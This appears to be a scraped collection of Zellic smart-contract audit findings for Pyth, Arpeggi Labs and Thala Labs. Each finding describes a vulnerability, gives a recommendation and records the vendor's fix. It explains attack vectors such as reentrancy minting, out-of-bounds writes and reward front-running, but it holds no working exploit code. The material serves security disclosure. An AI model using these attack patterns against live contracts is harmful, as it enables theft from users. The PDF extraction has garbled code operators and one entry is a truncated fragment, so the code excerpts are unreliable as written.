ptr->latest_.pub_slot_ = slot + (uint64_t)cmd->slot_diff_[i]; } upd_aggregate( px, slot+1 ); The supplied number of iterations this loop should run is not bound in any way. This allows a caller to index past the end of the array, which has a fixed size of 32, and can allow an attacker to manipulate memory outside of the pricing components. Memory corruption is a critical violation of program integrity and safety guarantees. The ability to write out-of-bounds can violate the integrity of data structures and in- variants in the contract. Thankfully, this instruction validates that only two accounts can be supplied in invocation which does help reduce the impact, but this behavior is still dangerous and may result in an attack that could result in price manipulation. The num_ variable is also referenced in upd_aggregate, which eventually leads an out- Zellic Pyth Data Association of-bound stack write that can be potentially leveraged to redirect control flow. The upd_test instruction should validate that cmd->num_ is equal to or less than PC_COMP_SIZE. This will preventing the out-of-bound indexing and write behavior. The finding has been acknowledged by Pyth Data Association. Their official response is reproduced below: Pyth Data Association acknowledges the finding and a security fix for this issue will be deployed on or before April 18th. Zellic Pyth Data Association", + "html_url": "https://github.com/Zellic/publications/blob/master/Pyth Oracle Client - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Lack of rent exemption enforcement", + "labels": [ + "Zellic" + ], + "body": "Target: oracle.c Severity: High : High Category: Business Logic Likelihood: Low To support the validators that maintain account state, Solana imposes rent on ac- counts. Every so often, if an account does not have more than the minimum required lamports to qualify as \u201crent exempt\u201d, an amount of lamports are collected as rent. If an account\u2019s balance hits 0, the data for the account is forgotten, effectively resetting the account. Thus, it is possible to reinitialize accounts which have run out of lamports. Pyth uses accounts created and supplied by the caller to store data. Pyth does not re- quire that these accounts maintain a balance large enough to qualify as \u201crent exempt\u201d. This means that a caller can supply an account with too few lamports, initialize it as a particular account type, and, after rent has drained the account, use the account as if it were brand new. This type of confusion can be found everywhere in the code as rent is not enforced for any accounts supplied by the user. The lack of rent exemption checks can result in invariants in the code breaking which can impact clients interacting with the state of these accounts or the contract itself. For example, product accounts can only be placed into a map if they haven\u2019t been initialized yet. This step, using the add_product instruction, requires the product ac- count to be initialized but the data field empty. This should only be true if the product account has never been used before, but because this account can be wiped out due to rent we can actually add this product account to multiple maps resulting in the product\u2019s prod_ field pointing to an incorrect map. Pyth should either: 1. Use Program Derived Accounts (PDA) to manage state and delegate signing au- thority in a way similar to Solana\u2019s Token accounts (with an owner or authority field on the PDA). These accounts should be created with a minimum \u201crent ex- empt\u201d qualifying balance. Zellic Pyth Data Association 2. Require all accounts supplied by the user to be rent exempt. It should be suffi- cient to update both valid_signable_account and valid_writable_account with this check to get the desired mitigation in place. The finding has been acknowledged by Pyth Data Association. Their official response is reproduced below: Pyth Data Association acknowledges the finding and a security fix for this issue will be deployed on or before April 18th. Zellic Pyth Data Association", + "html_url": "https://github.com/Zellic/publications/blob/master/Pyth Oracle Client - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Inefficient publisher deletion algorithm results in excessive costs", + "labels": [ + "Zellic" + ], + "body": "Target: oracle.c:del_publisher Severity: Low : Low Category: Optimization Likelihood: High The del_publisher instruction allows a caller to remove a publisher from a price ac- count. To do this, the instruction first loops through the publishers on the price ac- count\u2019s comp_ array. After identifying the index of comp_ with the publisher account, an inner loop runs which shifts all of the accounts down. static uint64_t del_publisher( SolParameters *prm, SolAccountInfo *ka ) { ...)) /) try to remove publisher for(uint32_t i=0; i !) sptr\u2212>num_; +)i ) { pc_price_comp_t *iptr = &sptr->comp_[i]; if ( pc_pub_key_equal( &iptr\u2212>pub_, &cptr\u2212>pub_ ) ) { for( unsigned j=i+1; j !) sptr\u2212>num_; +)j ) { pc_price_comp_t *jptr = &sptr->comp_[j]; iptr[0] = jptr[0]; iptr = jptr; } --sptr->num_; sol_memset( iptr, 0, sizeof( pc_price_comp_t ) ); /) update size of account sptr->size_ = sizeof( pc_price_t ) - sizeof( sptr\u2212>comp_ ) + sptr->num_ * sizeof( pc_price_comp_t ); return SUCCESS; } } } This is an inefficient way to remove the publisher account from the price account. Zellic Pyth Data Association This can result in excessive fees for removing a publisher than would otherwise be necessary. It also increases code complexity, which may leads to bugs in the future. A more efficient solution would be to replace the publisher account with the last pub- lisher account and then clear out the final publisher entry. A reference implementation is supplied. for(uint32_t i = 0; i !) sptr\u2212>num_; +)i ) { pc_price_comp_t *iptr = &sptr->comp_[i]; /) identify the targeted publisher entry if ( pc_pub_key_equal( &iptr\u2212>pub_, &cptr\u2212>pub_ ) ) { /) select the last publisher entry pc_price_comp_t *substitute_ptr = &sptr->comp_[sptr->num_ - 1]; /) swap the current publisher entry with the last one - it's okay if this is the same entry iptr[0] = substitute_ptr[0]; /) clear out the last publisher sol_memset(substitute_ptr, 0, sizeof( pc_price_comp_t )); /) reduce the number of publishers by one --sptr->num_; /) recalculate size sptr->size_ = sizeof( pc_price_t ) - sizeof( sptr\u2212>comp_ ) + sptr->num_ * sizeof( pc_price_comp_t ); return SUCCESS; } } The finding has been acknowledged by Pyth Data Association. Their official response is reproduced below: Pyth Data Association acknowledges the finding, but doesn\u2019t believe it has secu- rity implications. However, we may deploy a bug fix to address it. Zellic Pyth Data Association", + "html_url": "https://github.com/Zellic/publications/blob/master/Pyth Oracle Client - Zellic Audit Report.pdf" + }, + { + "title": "8.02 for it (the ratio between buy and sell price is not quite 10 anymore, as user B buying at a viralit", + "labels": [ + "Zellic" + ], + "body": "8.02 for it (the ratio between buy and sell price is not quite 10 anymore, as user B buying at a virality", + "html_url": "https://github.com/Zellic/publications/blob/master/SAX - Zellic Audit Report.pdf" + }, + { + "title": "3.1 An attacker can break minting of ArpeggiSound and Arpeggi Song tokens", + "labels": [ + "Zellic" + ], + "body": "Target: ArpeggiSound, ArpeggiSong, AudioRegistryProtocol Severity: Critical Category: Business Logic : Critical Likelihood: High ArpeggiSound.mintSample, ArpeggiSound.mintStem and ArpeggiSong.mintSong are vul- nerable. We will use ArpeggiSong.mintSong as an example to demonstrate the issue, but every- thing below applies to ArpeggiSound.mintSample and ArpeggiSound.mintStem as well. When a new song NFT is minted, the following occurs. First, mintSong mints a new NFT by calling _safeMint. Second, mintSong creates an origin token[1]: AudioRegistryTypes.OriginToken memory originToken = AudioRegistryTypes. OriginToken({ tokenId: numSongs, chainId: block.chainid, contractAddress: address(this), originType: AudioRegistryTypes.OriginType.PRIMARY /) primary }); Third, mintSong passes the origin token to the AudioRegistryProtocol.registerMedia function. Fourth, registerMedia creates a new media ID and attempts to tie the newly minted NFT to it. If the newly minted NFT is already tied to a media ID, the attempt fails and the trans- action is reverted.[2] Anyone can register a new media ID and tie an unminted NFT to it, simply by calling 1 The origin token is simply a wrapper around the newly minted NFT. 2 Unless the caller of registerMedia can pass the checks in the enforceOnlyOverwriteAuthorized func- tion. The contract that issued the already tied NFT fails to pass the checks. Zellic Arpeggi Labs registerMedia with appropriate parameters. There are no checks that prevent that. Therefore, anyone can break minting by registering a new media ID and tying a next- to-be-minted unminted NFT to it. An attacker can break minting of ArpeggiSound and ArpeggiSong tokens. Consider disallowing the registration of unminted NFTs. We provided a proof-of-concept to Arpeggi Labs. This issue was fixed by Arpeggi Labs in commit cc29275. Zellic Arpeggi Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Arpeggi_Labs_-_Zellic_Audit_Report.pdf" + }, + { + "title": "3.2 Potentially unsafe reentrancy in the minting functions", + "labels": [ + "Zellic" + ], + "body": "Target: ArpeggiSong, ArpeggiSound Category: Business Logic Likelihood: High Severity: Medium : Medium Arpeggi Studio allows users to mint samples, stems and songs and use them in the digital audio workstation. Samples are the smallest \u201cunits\u201d of sound (think of a hand- clap sound effect in a song) in the Arpeggi ecosystem. A stem is a single track of a song. It is created by sequencing one or more samples into a pattern. A song is composed of multiple stems. When a user creates music in Arpeggi Studio and is ready to mint a song, the Arpeggi Studio webapp processes the music and mints to the contract via various functions: ArpeggiSound.mintSample ArpeggiSound.mintStem ArpeggiSong.mintSong There is a reentrancy issue in all of the 3 functions above. We will focus on ArpeggiSo und.mintSample for the rest of this example. Below is a code snippet from mintSample: function mintSample( uint version, address artistAddress, address tokenOwner, string calldata dataUri, string calldata metadataUri ) { external payable whenNotPaused returns (uint256) _numSounds++; uint numSounds = _numSounds; _safeMint(tokenOwner, numSounds); /) registration logic is below In mintSample, the state variable _numSounds is incremented each time before a new Zellic Arpeggi Labs ERC721 token is minted. After _numSounds is incremented, the token is minted through _safeMint and a call is made to AudioRegistryProtocol.registerMedia to register the token\u2019s metadata in the AudioRegistryProtocol contract. A reentrancy attack is potentially possible because the increment of _numSounds hap- pens without checking if _numSounds has already been minted. Furthermore, the call to _safeMint happens before any of the registration logic is executed. This reentrancy issue allows an arbitrary amount of tokens to be minted in a way that breaks the expected mediaId-to-tokenId metadata storage schema for sample, stem and song tokens. For example, using reentrancy to mint 10 tokens results in this: token.contractAddress = 0xcf7...)), mediaId = 1, token.tokenId = 10 token.contractAddress = 0xcf7...)), mediaId = 2, token.tokenId = 9 token.contractAddress = 0xcf7...)), mediaId = 3, token.tokenId = 8 token.contractAddress = 0xcf7...)), mediaId = 4, token.tokenId = 7 token.contractAddress = 0xcf7...)), mediaId = 5, token.tokenId = 6 token.contractAddress = 0xcf7...)), mediaId = 6, token.tokenId = 5 token.contractAddress = 0xcf7...)), mediaId = 7, token.tokenId = 4 token.contractAddress = 0xcf7...)), mediaId = 8, token.tokenId = 3 token.contractAddress = 0xcf7...)), mediaId = 9, token.tokenId = 2 token.contractAddress = 0xcf7...)), mediaId = 10, token.tokenId = 1 Here, the minted tokens have their mediaId and tokenId values out of sync. We recommend that Arpeggi follows the checks-effects-interactions pattern by mov- ing the increment of _numSounds and the call to _safeMint after the registration logic at the end of the function. This will ensure that _numSounds is accurate and that the associated metadata is correct if mintSample is reentered. In addition to this, Arpeggi can make use of OpenZeppelin\u2019s ReentrancyGuard contract to add a nonReentrant modifier to all of the minting functions. We provided a proof-of-concept to Arpeggi Labs. This issue was fixed by Arpeggi Labs in commit 52cef08. Zellic Arpeggi Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Arpeggi_Labs_-_Zellic_Audit_Report.pdf" + }, + { + "title": "3.3 Payable functions exist with no way to withdraw funds", + "labels": [ + "Zellic" + ], + "body": "Target: ArpeggiSong, ArpeggiSound Category: Business Logic Likelihood: High Severity: Medium : Medium The mint functions: mintSample, mintStem and mintSong are declared payable, but there is no function to withdraw funds. The Arpeggi team stated that users will not pay for minting, so we recommend re- moving the payable modifier from these functions. This issue was fixed by Arpeggi Labs in commit 996c882. Zellic Arpeggi Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Arpeggi_Labs_-_Zellic_Audit_Report.pdf" + }, + { + "title": "3.4 Origin token registration may result in a collision", + "labels": [ + "Zellic" + ], + "body": "Target: AudioRegistryProtocol Category: Business Logic Likelihood: n/a Severity: Medium : Medium If an origin token t1 is registered and there is an attempt to register another origin token t2, such that t1.contractAddress =) t2.contractAddress and t1.tokenId =) t2.toke nId, a collision happens: t1 gets overwritten by t2 (in case the caller of registerMedia passes the checks in enforceOnlyOverwriteAuthorized) or the entire transaction gets reverted (otherwise). It is impossible to register 2 or more origin tokens with identical contractAddresses and tokenIds, but different chainIds or originTypes. Consider replacing the _contractTokensToArpIndex mapping with an \u201corigin token\u201d- to-\u201cmedia ID\u201d mapping and reorganizing the code accordingly. This issue was fixed by Arpeggi Labs in commit bd3a6ec. Zellic Arpeggi Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Arpeggi_Labs_-_Zellic_Audit_Report.pdf" + }, + { + "title": "3.5 The access control list for the Arpeggi admin role cannot be changed", + "labels": [ + "Zellic" + ], + "body": "Target: ArpeggiSound, ArpeggiSong Category: Business Logic Likelihood: n/a Severity: Low : Low The ArpeggiSound and ArpeggiSong contracts do not set an admin role for ARPEGGI_AD MIN_ROLE. It is impossible to change the access control list for ARPEGGI_ADMIN_ROLE. Consider adding the following code to the constructors of ArpeggiSound and Arpeggi Song: _setRoleAdmin(Roles.ARPEGGI_ADMIN_ROLE, Roles.ARPEGGI_ADMIN_ROLE); This issue was fixed by Arpeggi Labs in commit 67f8be0. Zellic Arpeggi Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Arpeggi_Labs_-_Zellic_Audit_Report.pdf" + }, + { + "title": "3.6 The UPGRADER_ROLE role is defined, but never used", + "labels": [ + "Zellic" + ], + "body": "Target: AudioRegistryProtocol Category: Business Logic Likelihood: n/a Severity: Low : Low UPGRADER_ROLE is defined in AudioRegistryProtocol.sol at L12, but this role is never used anywhere. We assume that UPGRADER_ROLE was intended to be used in the _aut horizeUpgrade function, but _authorizeUpgrade uses DEFAULT_ADMIN_ROLE instead: function _authorizeUpgrade(address newImplementation) internal onlyRole(DEFAULT_ADMIN_ROLE) override {} The members of UPGRADER_ROLE are not given permission to upgrade the AudioRegist ryProtocol contract. Consider modifying _authorizeUpgrade to replace DEFAULT_ADMIN_ROLE with UPGRADER_ ROLE: function _authorizeUpgrade(address newImplementation) internal onlyRole(UPGRADER_ROLE) override {} This issue was fixed by Arpeggi Labs in commit 00524c4. Zellic Arpeggi Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Arpeggi_Labs_-_Zellic_Audit_Report.pdf" + }, + { + "title": "3.1 New governance source may break transfer functionality", + "labels": [ + "Zellic" + ], + "body": "Target: CosmWasm Category: Coding Mistakes Likelihood: Low Severity: Low : Low The AuthorizeGovernanceDataSourceTransfer action is used to modify the currently authorized governance source (i.e., the caller address that may perform governance actions through this contract). This is done through the execute_governance_instruct ion() function. Specifically, the AuthorizeGovernanceDataSourceTransfer calls into transfer_governan ce(). This action allows the caller (who is the currently authorized governance source) to pass in a claim VAA that contains information about the new governance source to authorize. This claim VAA is supplied by the new governance source. To prevent replay attacks, the claim VAA also contains a governance_data_source_ind ex, which needs to be larger than the currently stored index. If it is not, it means that a previous AuthorizeGovernanceDataSourceTransfer message is being replayed, and thus the contract will reject it. This check can be seen in the transfer_governance() function: fn transfer_governance( next_config: &mut ConfigInfo, current_config: &ConfigInfo, parsed_claim_vaa: &ParsedVAA, ) -> StdResult { /) [ ...)) ] match claim_vaa_instruction.action { RequestGovernanceDataSourceTransfer { governance_data_source_index, } => { if current_config.governance_source_index >) governance_data_source_index { Err(PythContractError:)OldGovernanceMessage)? Zellic Pyth Data Association } /) [ ...)) ] } _ => Err(PythContractError:)InvalidGovernancePayload)?, } } The governance_source_index configuration property is a u32, so if the new governance source passes in a RequestGovernanceDataSourceTransfer action with the governanc e_data_source_index property set to the maximum u32 value, then any subsequent RequestGovernanceDataSourceTransfer action can never have a higher governance_da ta_source_index property, and thus this action can never be performed again. We do not consider this a security issue, as the new governance source is considered to be a trusted entity by the protocol already. We do however recommend that this be fixed, as the new governance source may accidentally brick this governance source transfer functionality of the contract by passing in the maximum u32 value for the gov ernance_data_source_index. Consider adding a check such that the governance_data_source_index is higher than the currently stored governance_source_index but still within a certain amount. Pyth Data Association acknowledges the finding and developed a patch for this issue: commit 3e104b41. Zellic Pyth Data Association", + "html_url": "https://github.com/Zellic/publications/blob/master/Pyth Network CosmWasm - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Stealing of liquidation rewards in stability_pool", + "labels": [ + "Zellic" + ], + "body": "Target: stability_pool Category: Business Logic Likelihood: High Severity: High : Critical The share of liquidation rewards entitled to APD depositors in the stability pool de- pends on the user\u2019s deposited amount relative to the value of the pool at the time of the liquidation call. /) Compute share of the pool let (deposit_amount, _, next) = iterable_table:)borrow_iter_mut(stability_pool_deposits, depositor); let share = ((*deposit_amount as u128) * SHARE_DECIMAL_CONSTANT) / (stability_pool_apd_amount as u128); \u2026 let collateral_share_amount = (((collateral_amount as u128) * share) / SHARE_DECIMAL_CONSTANT as u64); *depositor_collateral_share = *depositor_collateral_share + collateral_share_amount; There is nothing to enforce that depositors of APD who are compensated from prof- itable liquidation events actually had APD deposited prior to the profitable liquidation event and hence exposure to losses. The above mechanism creates the following attack vector: 1. Identify profitable liquidation vaults (these are deterministic and can be deter- mined from reviewing the liquidation compensation mechanism). 2. Deposit a large amount of APD into the liquidation pool to obtain a dispropor- tionate share of the rewards. Zellic Thala Labs 3. Call liquidate, receive rewards, and withdraw them from the liquidity pool. With access to sufficient amounts of APD, a malicious user could claim the vast ma- jority of the rewards. Such attacks would lead to loss of confidence in the protocol. Users would likely remove their funds from the stability pool due to lack of compen- sation for risks taken. The attack can be discouraged by enforcing timelocks on APD deposits into the sta- bility pool. However, there is still the potential for gaming. For example, depending on market conditions, it could be economically rational to flood the pool with APD to steal liquidation rewards and ride out any subsequent exposure to losses in the sta- bility pool. The use of timelocks would, however, prevent pool takeovers from flash loans. A more involved fix would be to require that compensation to APD depositors de- pends on the amount of time they have been in the pool. Of course, this also needs careful consideration as it may discourage important sources of liquidity from sup- porting the pool if they are not going to be compensated for it. To mitigate risk-free profit from opportunistic deposits, the protocol now requires liq- uidity providers to hold funds in the pool for 24 hours or incur a linear fee. This solution would theoretically help significantly with the problem, but it would require separate review due to the presence of extensive architectural changes. We believe the fix does not entirely mitigate the issue \u2014 depositors can still front-run profitable events to add funds and accept the 24 hours of risk. We encourage Thala Labs to evaluate further mitigations (such as a short delay on the deposit side) and consider whether they would be helpful for the protocol economics. Zellic Thala Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Riskless liquidation rewards in stability_pool", + "labels": [ + "Zellic" + ], + "body": "Target: stability_pool Category: Business Logic Likelihood: High Severity: High : Critical The profits for stability pool depositors are initially increasing as the price of collateral assets relative to APD decreases. Profits continue to increase until they reach their maximum, after which they begin to decrease and eventually become losses. The intercepts for profit and loss and the location of peak profit depend on system parameters. However, in general there is an optimal liquidation price at which maxi- mum profit is realized for the liquidation. Below this price, profits are decreasing until they eventually cross a critical threshold and turn into losses. Because APD depositors are able to freely deposit and withdraw funds from the stabil- ity pool, the incentive mechanism above creates free optionality for APD depositors. For example, a clever depositor can avoid losses in all cases by 1. Calling liquidate themselves when it optimizes the profit of the stability pool. 2. Front-run liquidation events that would result in losses by withdrawing APD prior to the liquidation call. Furthermore, there are no economic incentives for anyone who is not a stability pool depositor to call vault:)liquidate. A malicious actor who follows this strategy can effectively steal other APD depositors from their compensation. It is likely that word of this exploit would spread, resulting in other APD depositors following this strategy or, when unable to do so, removing their deposits from the protocol. This would effectively break a critical mechanism of the design and the integrity of the stablecoin. We recommend the following changes in order to remove the attacker vector: Zellic Thala Labs 1. Add timelocks for depositors. 2. Provide incentives for nonstability pool depositors to call vault:)liquidate. It is important to note, however, that the proper functioning of the stablecoin protocol requires that APD depositors have timely access to their funds. For example, it may be necessary to support other mechanisms in the protocol such as calls to vault:)re deem_collateral. Careful consideration should be made in determining the appropriate length of time for timelocks. It may even be advisable to actively manage the length of timelocks in response to market conditions. Thala Labs has incorporated a mitigation for this issue by enforcing a minimum deposit time with a linear fee. Due to extensive changes in the project, a separate review would be required to confirm its correctness. To further discourage liquidity providers from front-running negative events to leave the pool, we encourage Thala Labs to consider adding a short delay for all withdrawals \u2014 even those by depositors who have spent significant time in the pool. Zellic Thala Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Redemption mechanism allows undercollateralized vaults to escape liquidation penalization", + "labels": [ + "Zellic" + ], + "body": "Target: vault Category: Business Logic Likelihood: High Severity: High : Critical Undercollateralized vaults can have their debt paid off without incurring liquidation penalities when users make calls to vault:)redeem_collateral. The amount of debt paid off in a given vault during a call to liquidation is given by the following: let redeemed_usd = fixed_point:)min( fixed_point:)min(collateral_usd, debt_usd), fixed_point:)from_u64(coin:)value(&remained_debt_coin)), ); In the event that collateral_usd < debt_usd and collateral_usd < remained_debt_c oin prior to the call to repay_internal, and a remained_debt_coin > 0 after the call to repay_internal, repay_internal(redeemee, coin:)extract(&mut remained_debt_coin, redeemed_debt)); the full collateral of the vault will be removed and an amount of debt equal to the collateral amount will be paid. However, the vault will hold a debt equal to debt_usd - collateral_usd. Additionally, the vault with zero collateral and nonzero debt will be reinserted into the sorted vault: /) update sorted_vaults if (coin:)value(&remained_debt_coin) !) 0) { /) all debt repayed, so should be inserted as head sorted_vaults:)reinsert( redeemee, math:)compute_nominal_cr(0, 0), option:)none(), Zellic Thala Labs sorted_vaults:)get_first(), ); } else { The ability for undercollateralized positions to be exited without paying penalties to the stability pool disincentivizes users from supporting the stability of the protocol by depositing APD into the stability pool. Furthermore, it creates a way for undercollat- eralized vaults to redeem their collateral without incurring any penalty. Vaults with zero collateral and nonzero debt should not exist in the system at all, let alone in the head of the SortedVaults, where it is assumed that positions have nonzero debt. Furthermore, this APD would effectively be locked out from burning and would result in outstanding APD that is not backed by collateral. While this might not immediately break the protocol, these unbacked APD positions could accumulate over time. Given one of the aims of the protocol is to ensure that all APD is not only backed by collateral but is overcollateralized, this could result in loss of confidence in the protocol. The situation can be avoided if undercollateralized vaults cannot be redeemed but can only be liquidated. An undercollateralization check should be included in the logic for vault:)redeem_col lateral. Thala should consider auto-liquidating these vaults when they are encoun- tered during calls to vault:)redeem_collateral. Thala Labs has implemented a fix in commit 9ac67d7c that skips redemption when vaults are undercollateralized. This mitigation addresses the issue pointed out, but its interactions with other significant protocol changes would require a separate review. Zellic Thala Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Public access to register_collateral can lock out collateral CoinTypes from APD", + "labels": [ + "Zellic" + ], + "body": "Target: vault Category: Business Logic Likelihood: High Severity: High : High The function stability_pool:)register_collateral is public when it should be publ ic(friend): public entry fun register_collateral(account: &signer) { assert!(signer:)address_of(account) =) @thala_protocol_v1, ERR_UNAUTHORIZED); assert!(initialized(), ERR_UNINITIALIZED); if (!exists)(@thala_protocol_v1)) { let collateral = coin:)zero(); let shares = table:)new(); move_to(account, DistributedCollateral { collateral, shares }); } } A malicious actor can call register_collateral for any CoinType prior to this function being called from its intended control flow via an internal function call made by vaul t:)initialize. The assertion checks in vault:)initialize: public entry fun initialize(manager: &signer) { assert!(signer:)address_of(manager) =) @thala_protocol_v1, ERR_INVALID_MANAGER); assert!(manager:)initialized(), ERR_UNINITIALIZED_MANAGER); assert!(!exists)(@thala_protocol_v1), ERR_INITIALIZED_COLLATERAL); stability_pool:)register_collateral(manager); sorted_vaults:)initialize(manager); Zellic Thala Labs move_to(manager, CollateralState { total_collateral: 0, total_debt: 0, }); } This will prevent the protocol manager from being able to initialize vaults for the given CoinType. In the worst case scenario, it would be possible for an attacker to completely prevent the deployment of vaults for any CoinType. Modify the access to stability_pool:)register_collateral from public to public(fr iend). Thala Labs has followed our recommendation and changed stability_pool:)regist er_collateral from public to public(friend) in commit fdba1010. Zellic Thala Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Partially filled APD redemptions always charge the full re- demption fees", + "labels": [ + "Zellic" + ], + "body": "Target: vault Category: Business Logic Likelihood: High Severity: Medium : Medium Partially filled APD redemptions always charge the full redemption fee, even if some of the APD passed in the function call is not redeemed: public fun redeem_collateral( debt: Coin, /) TODO - take hints from the off-chain /) prev: Option
, /) next: Option
, ): (Coin, Coin) acquires VaultStore, CollateralState { let remained_debt_coin = debt; let redeemed_collateral_coin = coin:)zero(); let redemption_fee_amount = { let redemption_fee = get_redemption_fee(); let remained_debt_amount = fixed_point:)from_u64(coin:)value(&remained_debt_coin)); fixed_point:)to_u64(fixed_point:)mul(remained_debt_amount, redemption_fee)) }; let redemption_fee_coin = coin:)extract(&mut remained_debt_coin, redemption_fee_amount); manager:)charge_redemption_fee(redemption_fee_coin); Because the variable redemption_fee_coin is not adjusted to account for partial re- demptions, users who call vault:)redeem_collateral are always charged the full re- demption fee. This could discourage users from calling vault:)redeem_collateral and potentially alter the economics of interacting with the protocol to the point where users seek alternative stablecoin protocols. Zellic Thala Labs Calculate redemption_fee_coin at the end of the vault:)redeem_collateral based on the actual amount of APD redeemed. Thala Labs updated the function in commit 6de6e464 to charge the correct fee for redemption. Since other architectural changes have affected the function as well, additional review would be required to confirm the correctness of redemption me- chanics. Zellic Thala Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" + }, + { + "title": "3.6 Distribution mechanism for liquidation rewards susceptible to max_gas", + "labels": [ + "Zellic" + ], + "body": "Target: stability_pool Category: Business Logic Likelihood: Medium Severity: Medium : Medium On the liquidation of undercollateralized vaults, control is passed from vault:)liqui date to stability_pool:)distribute_collateral_and_request_apd. This function uses a while loop to iterate over all of the addresses in an iterable table: struct StabilityPool has key { apd: Coin, deposits: IterableTable, num_depositors: u64, } ...)) public(friend) fun distribute_collateral_and_request_apd( vault_addr: address, requested_apd: u64, collateral: Coin ): Coin acquires StabilityPool, StabilityPoolEvents, DistributedCollateral { ...)) let depositor_iter_option = iterable_table:)head_key(stability_pool_deposits); while (option:)is_some(&depositor_iter_option)) { let depositor = *option:)borrow(&depositor_iter_option); ...)) As the number of APD depositors grows, the gas costs of liquidation will steadily in- crease. Additionally, a malicious attacker could flood the StabilityPool.deposits it- erable table with accounts with zero APD deposited. This could eventually lead to max_gas and the inability for stability pool depositors to be rewarded for risks taken in supporting the stability pool. Zellic Thala Labs We suggest Thala Labs adopt the reward distribution mechanism central to the ERC 4626 token vault standard. Rather than looping over depositors when allocating re- wards, it increments the redemption value of shares held by all depositors to reflect increases in claimable rewards. Thala Labs has overhauled the reward system and adopted a pull-based approach for distributions. These changes can be seen in commit 513f0736. Conceptually, this is a move in the right direction; however, verifying the security of these changes would require a separate review. Zellic Thala Labs 3.7 Low collateral positions can lead to max_gas Target: vault Category: Business Logic Likelihood: Medium Severity: Medium : Medium The vault:)open_vault function described previously enforces minimum collateral- ization rates but not minimum collateral. The implementation of sorted_vaults maintains a list of vaults ordered by decreasing collateralization rate. The redeem_collateral function in vault.move iterates from the sorted list\u2019s tail to extract collateral for APD; this can be expensive. Consider this excerpt from its implementation: while (option:)is_some(&min_cr_address) &) coin:)value(&remained_debt_coin) > 0) { let redeemee = *option:)borrow
(&min_cr_address); /) [...))] min_cr_address = sorted_vaults:)get_prev(redeemee); /) update sorted_vaults if (coin:)value(&remained_debt_coin) !) 0) { /) all debt repayed, so should be inserted as head sorted_vaults:)reinsert( redeemee, math:)compute_nominal_cr(0, 0), option:)none(), sorted_vaults:)get_first(), ); } else { let (vault_collateral, vault_debt) = collateral_and_debt_amount(redeemee); /) not all debt repayed, so should be reinserted with hint sorted_vaults:)reinsert( redeemee, math:)compute_nominal_cr((vault_collateral as u128), (vault_debt as u128)), Zellic Thala Labs option:)none(), /) TODO - should be prev option:)none(), /) TODO - should be next ); } }; Essentially, this begins at the vault with the lowest collateralization rate and iterates towards the head. It extracts collateral from positions until all the given APD is ex- changed. Each iteration reinserts the empty vault at the head, with the last requiring a traversal to find an insertion position. Because traversal begins at the end of the sorted vaults and continues until collateral is fully redeemed, an abundance of low-collateral vaults at the list\u2019s tail will make redeem_collateral more expensive in gas. An attacker could open many vaults with low collateral, setting the borrow amount to barely reach minimum collateralization rate. These low-collateral positions would be placed near the end of the sorted vaults where collateral redemption begins. This would increase gas costs and could lead to max_gas in vault:)redeem_collateral, af- fecting the ability of users to exchange APD for collateral. We recommend that vault:)open_vault enforces a minimum collateral requirement. This would significantly lessen the impact of flooding the sorted vault, as the redemp- tion of collateral would require fewer positions. Thala Labs has added logic to prevent the system from being flooded with zero- or low-collateral vaults. The additional checks can be found in commit 6de6e464. How- ever, fully verifying the correctness would require a separate review of the extensive architectural changes. Zellic Thala Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" + }, + { + "title": "3.8 Accumulation of vaults can lead to max_gas via insertion al- gorithm", + "labels": [ + "Zellic" + ], + "body": "Target: vault Category: Business Logic Likelihood: Medium Severity: Medium : Medium There are no controls preventing the creation of vaults with zero collateral in the call to vault:)open_vault. Additionally, there are no processes in place to remove vaults with zero collateral. The complete liquidation of all collateral in a vault does not result in a function call to vault:)close_vault. Furthermore, the current implementation of vault:)close_vault does not actually remove the vault from the SortedVaults data structure. The insertion and reinsertion algorithm of sorted_vaults uses the nominal collateral- ization ratio to determine the order placement of vaults inserted and reinserted into the SortedVaults data structure. In the current implementation, vaults with zero col- lateral (and hence zero debt) are placed at the front of the linked list. public fun compute_nominal_cr(collateral: u128, debt: u128): u128 { if (debt > 0) { (collateral * NICR_PRECISION / debt) } else { /) Return the maximal value for u128 if the Trove has a debt of 0. Represents \u201cinfinite\u201d CR. MAX_U128 } } In the current implementation, there are in general no hints provided for the insertion and reinsertion of vaults, whether they have zero or nonzero collateral or not. In the majority of cases, insertion or reinsertion require traversing the linked list from the head until the placement determined by the rank order of the nominal collateralization ratio is found. Uncontrolled size of the linked list can result in increasing gas costs for interacting with the protocol and ultimately its failure due to max_gas. Zellic Thala Labs There are two separate vectors contributing to reaching max_gas: 1. A malicious attacker can flood the system with zero-collateral vaults using calls to vault:)open_vault. 2. Depending on the number of users in the protocol, its regular operation will result in the steady increase of zero-collateral vaults that are never removed either by calls to vault:)close_vault or vault:)liquidate. A combination of the above is the most likely avenue to reaching max_gas. There are several recommendations that should be followed in order to address the issue: 1. Ensure that vaults cannot be opened with zero collateral. Furthermore, it may be beneficial to enforce a minimum collateral amount in order to open a vault to reduce the economic feasibility of the attack mentioned above. 2. Ensure that calls to vault:)close_vault result in removal of the vault from Sort edVaults. 3. Ensure that the complete liquidation of vaults results in calls to the updated ver- sion of vault:)close_vault. 4. Provide hints to the insertion and reinsertion algorithm to avoid traversing the linked list from head when it is not necessary. Thala Labs has added checks to ensure that zero-collateral vaults cannot be created. Specifically, in commit 6de6e464, vault creation is enforced against a minimum debt requirement. Fully validating these 